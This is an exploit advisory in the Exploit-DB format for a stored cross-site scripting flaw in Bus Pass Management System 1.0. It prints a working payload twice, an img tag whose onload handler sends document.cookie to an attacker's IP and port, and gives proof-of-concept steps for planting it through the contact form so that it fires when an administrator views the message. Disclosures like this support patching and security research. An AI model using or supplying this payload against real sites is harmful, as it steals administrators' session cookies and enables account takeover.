# Exploit Title: Bus Pass Management System 1.0  - Stored Cross-Site Scripting (XSS)
# Date: 2021-09-17
# Exploit Author: Matteo Conti - https://deltaspike.io
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
# Version: 1.0
# Tested on: Ubuntu 18.04 - LAMP

# Description
The application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message,
maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it.


# Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message)

# Tested Payload: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>

# Prof of concept:

- From /contact.php, send a message containing the following payload in "title" or "message" fields:

<img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>
(the first url have to be an existing image)

- Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php

- Your listener will receive the PHP session id.